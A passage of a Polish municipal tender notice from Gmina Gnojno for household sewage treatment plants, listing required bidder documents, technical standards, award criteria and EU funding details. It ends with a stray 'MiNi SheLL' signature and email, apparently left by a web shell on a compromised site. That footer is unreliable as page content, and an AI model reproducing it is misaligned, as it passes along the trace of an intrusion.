<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy, Kosztorys ofertowy, dowód wniesienia wadium, pełnomocnictwo -jeżeli dotyczy,  pisemne zobowiązania innych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów - jeżeli dotyczy,  pełny raport z badań skuteczności redukcji zanieczyszczeń proponowanej oczyszczalni wydany przez notyfikowane laboratorium zgodny z normą EN 12566-3; 2005 +A1:2009 ,(badanie skuteczności redukcji zanieczyszczeń wg metodologii określonej Załącznikiem  B  Normy),pełny raport z badań zgodności z normą EN 12566-3;2005 +A1:2009 wydany przez notyfikowane laboratorium w zakresie: 1)Wodoszczelności ,(Badanie wodoszczelności wykonane wg metodologii określonej  Załącznikiem  A  Normy),                                                                                                       2)Wytrzymałości konstrukcji (Badanie  wytrzymałości konstrukcji wg metodologii określonej  Załącznikiem  C Normy),  deklarację właściwości użytkowych(oznaczenie wyrobu symbolem CE) wystawioną przez producenta oczyszczalni potwierdzającą spełnienie wymogów normy EN 12566-3;2005 +A1:2009 oraz dokumenty na podstawie, których będzie można zweryfikować równoważność oferowanego rozwiązania, w szczególności kompletną aktualną Aprobatę Techniczną, inne deklaracje zgodności z zobowiązującymi normami, rysunki i schematy oczyszczalni oraz opis proponowanej technologii, aktualny certyfikat  DIN ISO 9001:2008  lub równoważny dokument potwierdzający wdrożenie i stosowanie równoważnego systemu jakości przy produkcji przydomowych oczyszczalni oparty na normach międzynarodowych lub europejskich, dokumentację DTR- oddzielnie dla każdego typu proponowanej oczyszczalni, szczegółową  instrukcję montażu i eksploatacji oczyszczalni z dokładnym opisaniem czynności jakie na etapie eksploatacji będzie zobowiązany wykonywać użytkownik oczyszczalni, w tym częstotliwości wymiany elementów podlegających zużyciu w czasie eksploatacji, informacje techniczne określone w pkt.  8 normy EN 12566-3;2005 +A1:2009
Przez pełny raport należy rozumieć oprócz przedłożonego raportu  sporządzonego przez notyfikowane laboratorium przedłożenie również wraz z nim, dokładnego opis próbek przekazanych do laboratorium celem ich przebadania wraz ze szczegółowymi rysunkami  (zbiorników, urządzeń i wyposażenia oczyszczalni), obliczeń wytrzymałościowych, opisów określających grubości ścian zbiorników komór osadników, opis technologii oczyszczania</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Okres udzielonej gwarancji pokrywającej całość zrealizowanego przedmiotu zamówienia - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Za zgodą Zamawiającego dopuszcza się możliwość wprowadzenia pisemnych zmian
postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy na podst. art. 144 ust. 1 ustawy w przypadku wystąpienia poniższych okoliczności:
W przypadku rezygnacji z wykonania oczyszczalni przydomowej przez odbiorcę (właściciela posesji) pomniejszone zostanie wynagrodzenie umowne za nie wykonaną oczyszczalnię przydomową w oparciu o kosztorys ofertowy.
zmiana obowiązujących przepisów ochrony środowiska
zmiana obowiązującej stawki VAT

Zmiana postanowień umowy na skutek zmian technologicznych, spowodowanych następującymi okolicznościami;

Zmiana materiałów lub urządzeń o parametrach tożsamych lub lepszych od przyjętych w ofercie w przypadku wycofania z rynku materiału lub urządzenia oferowanego
Przyjęcie nowszej technologii wykonania zaprojektowanych robót, pozwalającej na zaoszczędzeniu kosztów wykonania robót lub eksploatacji wykonanego przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.gminy.com.pl/gnojno/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gnojno, Gnojno 145, 28-114 Gnojno - pokój nr 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2015 godzina 09:30, miejsce: Urząd Gminy Gnojno, Gnojno 145, 28-114 Gnojno -  pokój nr 11 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt w części finansowany z Europejskiego Funduszu Rolnego na Rzecz Rozwoju Obszarów Wiejskich w ramach Programu Rozwoju Obszarów Wiejskich 2007-2013. Działanie 321 Podstawowe usługi dla gospodarki i ludności wiejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com